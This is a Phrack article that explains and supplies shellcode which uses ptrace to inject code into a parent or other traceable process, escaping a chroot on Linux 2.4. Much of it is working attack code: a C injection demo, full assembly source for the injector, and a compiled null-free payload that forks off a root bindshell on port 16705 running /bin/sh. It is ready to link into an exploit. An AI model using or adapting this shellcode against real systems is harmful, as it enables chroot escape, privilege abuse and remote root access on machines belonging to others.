                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12

|=---------------=[ Building ptrace injecting shellcodes ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------=[ anonymous author <p59_0c@author.phrack.org ]=-----------=|

---[ Contents

  1 - Testing environment
  2 - Why we should do ptrace injecting shellcode ?
  3 - What does ptrace
      3.1 - Requirement
      3.2 - How does the library make the call
  4 - Injecting code in a process - C code
      4.1 - The stack is our friend
      4.2 - Code to inject
      4.3 - Our first C code
  5 - First try to shellcodize it
      5.1 When you need somebody to trace
      5.2 Waiting (for love ?)
      5.3 Registers where are you ?
      5.4 Upload in progress
      5.5 You'll be a man, my son.
  6 - References and greetings

---[ 1 - Testing environment

First of all, I have to set the rules for my playground. I tested all
these techniques under linux 2.4.18 i386 with an executable stack. They
may work under any linux release, except the nonexec-stack ones, because
the code is injected on the stack. With a few modifications, it should be
possible to apply these techniques to any OS on any architecture, as long
as it supports the ptrace() system call.

---[ 2 - Why we should do ptrace injecting shellcode ?

Starting in some of the 2.4.x kernel series, the linux chroot is no longer
breakable by the good old well-known method (using chroot() tricks). The
linux chroot now really restricts the VFS usage, and a root shell in a
chrooted process may (theoretically) be unusable for a cracker, except for
modifying (for example on an FTP server) the ftp tree.

A uid of zero may still allow the cracker to do some other things that are
not restricted by the VFS on a standard 2.4 kernel :

  - Changing some kernel parameters (time of day, etc...).
  - Insert a kernel module (may be exploitable, but it is very hard to
    include a shellcode due to space restriction.
    It had been used in a wuftpd 2.5 exploit, by uploading a kernel
    backdoor and a statically linked insmod. That's way more complicated
    to do successfully than our tricks.)
  - Some VFS related thingies, like using open file descriptors.
  - Debug any process on the system.

There is a huge vulnerability in the chroot system, which is corrected by
some security patches available on the net. A root user in a chrooted env
is still ptrace-capable on any process on the system (except init, of
course). This technique is also generic (doesn't use open fd's, may be
usable even on non root processes) and a chrooted apache may infect
fingerd, as an example.

Here comes the idea to create a ptrace shellcode. We may, with this
shellcode, trace an unrestricted process and inject into it a second
shellcode, which runs a bindshell in our example.

Here is what we want for this ptrace shellcode :

  - Relatively small size (must be usable as a real shellcode). I saw in
    some exploits (like the 7350wu one) a small shellcode doing a
    read(0,%esp,shellcode_len), which I thought was a really
    "good-idea (TM)" for injecting a big shellcode. So this parameter is
    not so critical.

  - Must be runnable more than once in a short lapse of time. If the first
    exploitation attempt failed (e.g. port already bound), the traced
    process must not crash. (In the wuftpd case, if we inject malicious
    code in inetd, it should let it listen for ftp connections.)

  - The target process will most of the time be the parent process (inetd
    for an ftp server), which usually has full root access. We can also
    try all pids, starting from 2, until we find something traceable.

  - We can't look into /proc to find a process to trace.

These rules can be fulfilled, and are enough for most exploitation cases,
I think.

---[ 3 - What does ptrace

3.1 - Requirement

You may know that the ptrace system call was created for tracing and
debugging processes from usermode.
A process may be ptraced by only one process at a time, and only by a
process owned by the same user, or by root. Under linux, ptrace commands
are all implemented by the ptrace() function/syscall, with four
parameters. The prototype is :

    #include <sys/ptrace.h>
    long int ptrace(enum __ptrace_request request, pid_t pid,
                    void * addr, void * data)

'request' is a symbolic constant declared in sys/ptrace.h . We shall use
these :

PTRACE_ATTACH :   Attach to the process pid.

PTRACE_DETACH :   ugh, Detach from the process pid. Never forget to do
                  that, or your traced process will stay in stopped mode,
                  which is unrecoverable remotely.

PTRACE_GETREGS :  This command copies the process registers into the
                  struct pointed to by data (addr is ignored). This
                  structure is struct user_regs_struct, defined like this
                  in asm/user.h :

    struct user_regs_struct {
            long ebx, ecx, edx, esi, edi, ebp, eax;
            unsigned short ds, __ds, es, __es;
            unsigned short fs, __fs, gs, __gs;
            long orig_eax, eip;
            unsigned short cs, __cs;
            long eflags, esp;
            unsigned short ss, __ss;
    };

PTRACE_SETREGS :  This command does the opposite of PTRACE_GETREGS, with
                  the same arguments.

PTRACE_POKETEXT : This command writes the 32-bit word given in data at
                  the address addr of the traced process. This is
                  equivalent to PTRACE_POKEDATA.

An important thing when you attach a pid is that you have to wait for the
traced process to be stopped, and so have to wait for the SIGCHLD signal.
wait(NULL) does this perfectly (implemented in the shellcode by waitpid).

3.2 - How does the library make the call

As we are writing asm code, we have to know how to call the ptrace system
call directly. A few small tests show how the library wraps the syscall.
It is simply :

    eax is SYS_ptrace (26 decimal)
    ebx is request (e.g. PTRACE_ATTACH is 16)
    ecx is pid
    edx is addr
    esi is data

On error, the kernel returns a negative value (-errno) in eax, which the
library wrapper turns into -1. On success, the requests used here return
zero.
---[ 4 - Injecting code in a process - C code

4.1 - The stack is our friend

I've seen some injection mechanisms used by some ptrace() exploits for
linux, which injected a standard shellcode into the memory area pointed to
by %eip. That's the lazy way of doing injection, since the target process
is screwed up and can't be used again (it crashes or doesn't fork).

We have to find another way to execute our code in the target process.
That's what I was thinking about, and I found this :

  1- Get the current eip of the process, and the esp.
  2- Decrement esp by four
  3- Poke eip address at the esp address.
  4- Inject the shellcode into esp - 1024 address (Not directly before the
     space pointed to by esp, because some shellcodes use the push
     instruction)
  5- Set register eip as the value of esp - 1024
  6- Invoke the SETREGS method of ptrace
  7- Detach the process and let it open a root shell for you :)

The reason it is not usable on systems with a nonexec stack is that the
shellcode is uploaded onto the stack. That's a /feature/, not a bug.

I've heard of methods that save the memory context of the traced process,
upload the shellcode, wait for it to finish (usually after the fork) and
then restore the old state of the traced process. That's a way, but I
don't think it is really efficient, because modern non-exec patches also
prevent ptracing of unrestricted processes. (At least grsec does that.)

The target stack may look like this :

[DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP]
                     ^> Original esp points here      new eip<^
                         new<^>esp points here

Something important to do before the exploitation is to put two nop bytes
before the shellcode. The reason is simple : if ptrace has interrupted a
syscall being executed, the kernel will subtract two bytes from eip after
the PTRACE_DETACH to restart the syscall.

4.2 - Code to inject

The code to inject has to work peacefully with the stack we have set up
for it : it may fork(), and let the original process continue its job.
The new process may launch a bindshell !

Here's the code of s1.S , compilable with gcc :

/* all that part has to be done into the injected process */
/* in other word, this is the injected shellcode */
.globl injected_shellcode
injected_shellcode:
        // ret location has been pushed previously
        nop
        nop
        pusha                   // save before anything
        xor     %eax,%eax
        mov     $0x02,%al       //sys_fork
        int     $0x80           //fork()
        xor     %ebx,%ebx
        cmp     %eax,%ebx       // father or son ?
        je      son             // I'm son
        //here, I'm the father, I've to restore my previous state
father:
        popa
        ret     /* return address has been pushed on the stack previously */
        // code finished for father
son:    /* standard shellcode, at your choice */
.string ""

local@darkside:~/dev/ptrace$ gcc -c s1.S

Explanations :

The first two nops are the nops I discussed just before, because in my
final shellcode I chose to decrement the destination buffer address by
two.

The pusha saves all the registers on the stack, so the process may restore
them just after the fork. (I mean eax and ebx, which the code overwrites.)

If the return value of fork is zero, this is the son being executed. There
we insert any style of shellcode.

If the return value is not zero (but a pid), restore the registers and the
previously saved eip. The program may continue as if nothing had happened.

4.3 - Our first C code

Lots of theory, now a little practical example. Here is a program which
will fork, attach to its son, inject the code into it, let it run and then
kill it.

So, there is p2.c :

#include <stdio.h>
#include <stdlib.h>     /* malloc, atoi */
#include <string.h>     /* strlen, strcpy, strcat */
#include <unistd.h>     /* fork, sleep, write */
#include <signal.h>
#include <sys/types.h>  /* pid_t */
#include <sys/wait.h>   /* wait, waitpid */
#include <sys/ptrace.h>
#include <linux/user.h>

void injected_shellcode();

char *hello_shellcode=
"\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59"
"\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34"
"\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c"
"\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21" ; /* Prints hello. What a deal ! */

char *shellcode;

int child(){
        while(1){
                write(2,".",1);
                sleep(1);
        }
        return 0;
}

int father (pid_t pid){
        int error;
        int i=0;
        int ptr;
        int begin;
        struct user_regs_struct data;

        if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL))
                perror("attach");
        waitpid(pid,NULL,0);    /* wait until the child is stopped */
        if(error=ptrace(PTRACE_GETREGS,pid,&data,&data))
                perror("getregs");
        printf("%%eip : 0x%.8lx\n",data.eip);
        printf("%%esp : 0x%.8lx\n",data.esp);
        data.esp -= 4;          /* "push" the old eip */
        ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip);
        ptr=begin=data.esp-1024;
        printf("Inserting shellcode into %.8x\n",begin);
        data.eip=(long)begin+2; /* start after the two nops */
        ptrace(PTRACE_SETREGS,pid,&data,&data);
        while(i<strlen(shellcode)){     /* copy one 32-bit word at a time */
                ptrace(PTRACE_POKETEXT,pid,ptr,(int)*(int *)(shellcode+i));
                i+=4;
                ptr+=4;
        }
        ptrace (PTRACE_DETACH,pid,NULL,NULL);
        return 0;
}

int main(int argc,char **argv){
        pid_t pid=0;

        if(argc>1)
                pid=atoi(argv[1]);
        shellcode=malloc( strlen((char*) injected_shellcode) +
                          strlen(hello_shellcode) + 4);
        strcpy(shellcode,(char *) injected_shellcode);
        strcat(shellcode,(char *) hello_shellcode);
        printf("p2 : trying to launch shellcode on forked process\n");
        if(pid==0)
                pid=fork();
        if (pid){
                printf("I'm the father\n");
                sleep(2);
                father(pid);
                sleep(2);
                kill(pid,9);
                wait(NULL);
        }else{
                printf("I'm the child\n");
                child();
        }
        return 0;
}

Compile all that with gcc -o p2 p2.c s1.S and admire my cut & paste skillz

local@darkside:~/dev/ptrace$ ./p2
p2 : trying to launch shellcode on forked process
I'm the father
I'm the child
...%eip : 0x400c0a11
%esp : 0xbffff470
Inserting shellcode into bffff06c
.Hello,World !.

It really happened. The .... process forked and then printed
"Hello, world!".

---[ 5 - First try to shellcodize it

Before doing it, we have to remember our rules. I'll program it without
really optimizing it in size (I let bighawk or pr1 do that) but designing
it with preprocessor conditional assembly.

    gcc -DLONG  for a very careful shellcode (checks etc...)
    gcc -DSHORT for a very tiny shellcode (which does the minimum but
                is unsafe).
So, if size really matters, we can exit(0) simply by jumping anywhere, or
if size does not matter at all, we can make draconian tests.

I will use at&t syntax, compilable with gcc. If you don't like it, a good
(and big) awk script may do the trick.

5.1 When you need somebody to trace

A basic approach is first to set the stack pointer to a high value. We
can't be certain that the stack pointer is not less than the current eip
(in the case of a stack based overflow). The easiest (and laziest) way to
do this is to set esp to 0xbffffe04. This esp value works on nearly all
linux/x86 boxes I've seen, is near the stack bottom, but not too near, and
doesn't contain a zero.

Then, we get the parent pid with the getppid() syscall.

Next, first try to attach to it. If the attach fails, chances are 99% that
the ppid is init. In this case, we increment the pid until we can attach
to something.

(Warning, debugging this part of the code is not easy at all. When you
trace a process, you become its ppid. In this case, the shellcode will
attach to your debugger and a mutual deadlock will appear. Who said "A
cool/good anti-debugger technique ?")

So I included a test for the DEBUG_PID preprocessor variable. Put there
whatever pid you want to inject something in.

Note that the pid is put on the stack, at the 12(%ebp) place. That's
useful because we will need it in nearly all system calls.

5.2 Waiting (for love ?)

Now, the little shellcode has to wait for its child. There are two ways of
doing this :

  - waitpid(pid,NULL,NULL);
  - big big loop;

As I didn't succeed in making a reasonably short (in time) loop smaller in
size than the syscall, the code contains only the system call.

5.3 Registers where are you ?

The target process is ready to be modified, but the first thing to do with
it is to extract the registers. The ebp register is copied into esi, and
then esi is incremented by 16. It will be the "data" argument of the
ptrace call. So, after the syscall, the target registers begin at
16(%ebp).
Interesting registers are :

    esp : 76(%ebp)
    eip : 64(%ebp)

The register tricks I have described before are in the shellcode source,
and are not so complicated, including the "push"-like instruction to push
the old eip address.

5.4 Upload in progress

"Uploading" the shellcode, or injecting it in the target process, is just
a little loop. The shellcode itself is not really clear because the loop
counter used is esp. We set esp to the value specified in the macro
SHELLCODELEN. In edi, we set the memory address of the injected shellcode
in the current process. Edx contains the target address, previously
decremented by two in accordance with our earlier note about the nops.

Since eax must be zero after a successful system call, we can safely
compare it with esp to test whether the counter has reached zero.

5.5 You'll be a man, my son.

We can safely detach the process now. If we forget to detach (out of
laziness or simply lack of space) the process will remain in the stopped
state, and will need a SIGCONT to launch our bindshell.

After this hard work, the shellcode can exit, simply by the exit() syscall,
which usually doesn't alarm inetd or such and doesn't create any alarming
note in syslog. (For the SHORT version, "ret" may be enough to segfault
and so close the process.)

The bindshell I included binds port 0x4141. Remember that two fast
executions of the shellcode may block the port 0x4141 for minutes. That
was quite annoying while coding this.

The shellcode hasn't been optimized in size yet. You can compile the
attached code with gcc -DLONG -c -o injector.o injector.S and link it
with your favourite exploit. The code is 100% free of null chars. I didn't
look for newlines, carriage returns, spaces, percents, 0xff, etc...

---[ 6 - References and greetings

The man page of ptrace() is cool, lucid, informative, and so on.

Intel documentation book 2 (the instructions) was a useful book full of
1-byte-instructions-which-do-everything.
Special greets to the other guys from minithins.net, UNF people, my tender
girlfriend and to at&t who made their own cool asm syntax.

Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for
their special support, and especially to double-p, fozzy and OUAH who
corrected my lame english and gave me some advice.

<injector.s>
/* INJECTOR.S VERSION 1.0 */
/* Injects a shellcode in a process using ptrace system call */
/* Tested on : linux 2.4.18 */
/* NOT SIZE-OPTIMIZED YET */

#define SHELLCODELEN 30
/* That is, size of (the injected shellcode + bindshell)/4 */

#ifndef SHORT
#define LONG
#endif
#ifdef LONG
#undef SHORT
#endif

.text
.globl shellcode
.type shellcode,@function

shellcode:
        /* injector begins here */
        mov     $0xbffffe04,%esp
        /* first thing, we have to find our ppid */
        xor     %eax,%eax
        mov     $64,%al                 /* sys_getppid */
        int     $0x80
#ifdef DEBUG_PID
        mov     $DEBUG_PID,%ax
#endif
        /* put it on the stack */
        mov     %esp,%ebp               /* save the stack pointer in %ebp */
        mov     %eax,12(%ebp)           /* save the pid there */

        /* now we have to do a ptrace */
redo:
        xor     %eax,%eax
        mov     $26,%al                 /* sys_ptrace */
        mov     12(%ebp),%ecx
        mov     %eax,%ebx
        mov     $0x10,%bl               /* PTRACE_ATTACH */
        int     $0x80   /* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */
        xor     %ebx,%ebx
        cmp     %eax,%ebx
        je      good
        /* we are not leet enough, or ppid is init */
        inc     %ecx
        mov     %ecx,12(%ebp)
        jmp     redo

good:
        /* now we have to do a waitpid(pid,NULL,NULL) */
        mov     %eax,%edx               /* NULL */
        mov     %ecx,%ebx               /* pid */
        mov     %edx,%ecx               /* NULL */
        mov     $7,%al                  /* SYS_waitpid */
        int     $0x80

getregs:
        /* now get its registers */
        xor     %eax,%eax       /* Should waitpid return 0 ? never ;) */
        xor     %ebx,%ebx
        mov     %ebp,%esi
        add     $16,%esi                /* 16 up of the stack pointer */
        mov     $12,%bl                 /* %ebx is zero, PTRACE_GETREGS */
        mov     12(%ebp),%ecx           /* pid */
        mov     $26,%al                 /* %eax is zero. */
        /* %edx doesn't contain anything since PTRACE_GETREGS doesn't
           use addr */
        int     $0x80
        /* so now we have registers in 16(%ebp) */
        /* two interesting ones : %eip and %esp */
        /* %eip : (16+48)(%ebp) */
        /* %esp : (16+60)(%ebp) */
        /* rq : 12(%ebp) contains ppid */
        /* 8(%ebp) will contain the eip */

custom_push:
        sub     $4,76(%ebp)             /* dec the esp */
        mov     76(%ebp),%edi           /* put it in our temp eip */
        sub     $1036,%di
        mov     %edi,8(%ebp)            /* that's the address where we */
                                        /* shall start to install our code */
        /* we need to push the eip at top of the stack */
        mov     $26,%al
        mov     $4,%bl                  /* PTRACE_POKETEXT*/
        mov     12(%ebp),%ecx           /*ppid */
        mov     76(%ebp),%edx           /* esp we have decremented */
        mov     64(%ebp),%esi           /* old eip */
        int     $0x80                   /* what a work for push %eip */
        mov     %edi ,64(%ebp)  /* eip = our code nah, %edi == 8(%ebp) */

        /* now put our cool registers set */
setregs:
        xor     %eax,%eax
        xor     %ebx,%ebx
        mov     $26,%al
        mov     $13,%bl                 /* PTRACE_SETREGS*/
        /* ppid always set so %ecx */
        /* %edx ignored */
        mov     %ebp,%esi
        add     $16,%esi
        int     $0x80

        /* registers have been updated. now inject the shellcode */
        /* %edi : location in memory where we put the shellcode */
        jmp     start
goback:
        /* push on the stack the address of the shellcode to inject */
        mov     %edi,%edx               /* addr */
        dec     %edx
        dec     %edx
        /* returning from syscall, eip goes 2 before current eip */
        /* with this trick, it goes on 2 nops */
        pop     %edi                    /* data */
        xor     %eax,%eax
        mov     $SHELLCODELEN,%al
        mov     %eax,%esp
        mov     $4,%bl
loop:
        mov     $26,%al
        mov     12(%ebp),%ecx
        mov     (%edi),%esi
        int     $0x80
        dec     %esp
        add     $4,%edx                 /* target shellcode */
        add     $4,%edi                 /* local shellcode, source */
        cmp     %esp,%eax               /* Len > 0 ? */
        jne     loop

detach:
        mov     $26,%al
        xor     %ebx,%ebx
        mov     $0x11,%bl               /* PTRACE_DETACH */
        mov     12(%ebp),%ecx           /* pid */
        //xor   %edx,%edx
        //xor   %esi,%esi
        int     $0x80

        /* Now we can exit */
failed:
#ifdef LONG
        xor     %eax,%eax               /* exit silently */
        mov     %eax,%ebx
        mov     $1,%al                  /* sys_exit */
        int     $0x80                   /* die in peace, poor child */
#endif
#ifndef LONG
        ret
#endif

start:
        call    goback

        /* all that part has to be done into the injected process */
        /* in other word, this is the injected shellcode */
        // ret location has been pushed previously
        nop
        nop
        pusha           // save before anything by saving registers
        xor     %eax,%eax
        mov     $0x02,%al               //sys_fork
        int     $0x80                   //fork()
        xor     %ebx,%ebx
        cmp     %eax,%ebx               // father or son ?
        je      son                     // I'm son
        //here, I'm the father, I've to restore my previous state
father:
        popa
        ret                     /* code finished for the father */
son:    /* standard shellcode, at your choice */

/* Bind shellcode */
lnx_bind:
        xor     %eax,%eax
        cdq                             /* %edx= 0 */
        push    %edx                    /* IPPROTO_TCP */
        inc     %edx                    /* SOCK_STREAM */
        mov     %edx,%ebx               /* socket() */
        push    %edx
        inc     %edx                    /* AF_INET */
        push    %edx
        mov     %esp,%ecx
        mov     $102,%al
        int     $0x80
        mov     %eax,%edi               /* Save the socket in %edi */
        cdq                             /* %edx= sign of %eax = 0 */
        inc     %ebx                    /* bind */ /* was 1, become 2 */
        push    %edx                    /* 0.0.0.0 addr */
/*change            \/ here */
        push    $0x4141ff02     /* here, change the 0x4141 for the port */
/*                  /\      */
        mov     %esp,%esi       /* save the address of sockaddr in %esi */
        push    $16                     /* Size of this shit */ //$16
        push    %esi                    /* struct sockaddr * */
        push    %edi                    /* socket number */
        mov     %esp,%ecx               /* bind() */
        mov     $102,%al
        int     $0x80
        /* Erf, I use the previous data on the stack, they are even
           good enough */
        inc     %ebx                    /*3...*/
        inc     %ebx                    /*4 */
        mov     $102,%al
        int     $0x80
        /* Listen(fd,somehug) (somehuge always > 0 so it's good) */
        push    %esp                    /* Len */
        push    %esi                    /* sockaddr* */
        push    %edi                    /* socket */
        inc     %ebx                    /* 5 */
        mov     %esp,%ecx
        mov     $102,%al
        int     $0x80                   /* accept */
        xchg    %eax,%ebx       /* Save our precious file descriptor */
        pop     %ecx    /* take the value of %edi, that's usualy %ebx-1 */
duploop:
        mov     $63,%al                 /* dup2 */
        int     $0x80
        dec     %ecx
        cmp     %ecx,%edx
        jle     duploop                 //jnl loop
        /* For each file descriptor before %ebx, dup2() it */

        /* Std lnx_bin_sh_1 shellcode */
        push    %edx
        push    $0x68732f6e
        push    $0x69622f2f
        mov     %esp,%ebx
        push    %edx
        push    %ebx
        mov     %esp,%ecx
        mov     $11, %al
        int     $0x80
.string ""
</injector.s>

<injector.h>
// compiled with -DLONG
// binds to port 16705
char injector_lnx[]=
"\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd"
"\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a"
"\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31"
"\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb"
"\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd"
"\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10"
"\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83"
"\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c"
"\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d"
"\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89"
"\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d"
"\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89"
"\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4"
"\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd"
"\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0"
"\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d"
"\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd"
"\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31"
"\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74"
"\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3"
"\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89"
"\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89"
"\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd"
"\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0"
"\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68"
"\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
; /*size :279 */
</injector.h>